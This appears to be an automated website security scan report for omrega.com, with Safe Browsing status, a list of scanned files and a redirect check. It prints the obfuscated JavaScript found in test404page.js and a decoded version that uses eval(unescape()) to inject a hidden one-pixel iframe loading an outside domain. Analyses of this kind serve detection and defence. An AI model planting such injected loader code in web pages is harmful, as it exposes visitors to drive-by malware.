Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=omrega.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Scanned pages/files
| Request | Server response | Status |
|---|---|---|
http://omrega.com/ | 200 OK Content-Length: 906 Content-Type: text/html | clean |
http://omrega.com/.smileys/ | 200 OK Content-Length: 1057 Content-Type: text/html | clean |
http://omrega.com/.smileys/smiley1.gif | 200 OK Content-Length: 501 Content-Type: image/gif | clean |
http://omrega.com/test404page.js | 404 Not Found Content-Length: 6759 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):

var epRnN="cape(m4p";var ZjRGyrw="5A%TVG3";var fvCMA="VG69%TVG6C%TVG";var NNODeD="4J5Vu84JEV";var WgVaaUQU="u30Vu63Vu31Vu";var FwDU="bYY.repl";var DhKvCgz="38a758a6D";var sfja="AVu2FVu2FVu7";var U1aY6="8a748a55";var KAISEVh4="6F8a648a798a3";var pjdw3FIX=" pKp2PH='Vuq";var jWVC="827Vu84J9Vu84J4";var sAIt4t="gmq64gmq69g";var zsBs7qXG="69cNY73cNY";var Oz9WXU="50Vu6EVuqX";var tiFHDpUu="%TVG/g,'%'";var f5Sg="6CVu6CVu65Vu72";var R2mk1S="4J5Vu84JDVu84J5";var HI8fuCkH="u84J2Vu85";var Ez3r="73Vu72V";

Decoded script:

var B67N='gmq76gmq61gmq72gmq20gmq6Agmq71gmq41gmq61gmq58gmq33gmq74gmq55gmq3Dgmq22gmq3Cgmq64gmq69gmq76gmq20gmq69gmq64gmq3Dgmq27gmq66gmq4Cgmq32gmq38gmq6Bgmq48gmq27gmq3Egmq3Cgmq2Fgmq64gmq69gmq76gmq3Egmq22gmq3B';eval(unescape(B67N.replace(/gmq/g,'%')));var Rmb3='8a698a66hh488a648a6F8a638a758a6D8a658a6E8a74hh4E8a628a6F8a648a798a3D8a3D8a6E8a758a6C8a6Chh498a6A8a718a418a618a588a338a748a558a3Dhh478a3C8a628a6F8a648a798a3Ehh47hh4B8a6A8a718a418a618a588a338a748a55hh4Bhh478a3Chh4F8a628a6F8a648a798a3Ehh478
GPnBK3s.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';GPnBK3s.width='1';GPnBK3s.height='1';
GPnBK3s.name='VORoAmauDefH';GPnBK3s.style.visibility='hidden';
<div id='fL28kH'></div>

Antivirus reports:
| Request | Server response | Status |
|---|---|---|
http://omrega.com/.smileys/smiley10.gif | 200 OK Content-Length: 365 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley11.gif | 200 OK Content-Length: 397 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley12.gif | 200 OK Content-Length: 478 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley13.gif | 200 OK Content-Length: 591 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley14.gif | 200 OK Content-Length: 489 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley15.gif | 200 OK Content-Length: 505 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley16.gif | 200 OK Content-Length: 462 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley2.gif | 200 OK Content-Length: 482 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley3.gif | 200 OK Content-Length: 593 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley4.gif | 200 OK Content-Length: 497 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley5.gif | 200 OK Content-Length: 498 Content-Type: image/gif | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: omrega.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 12:48:29 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 906
Content-Type: text/html;charset=ISO-8859-1
...906 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: omrega.com
Referer: http://www.google.com/search?q=omrega.com
Result:
The result is similar to the first query. There are no suspicious redirects found.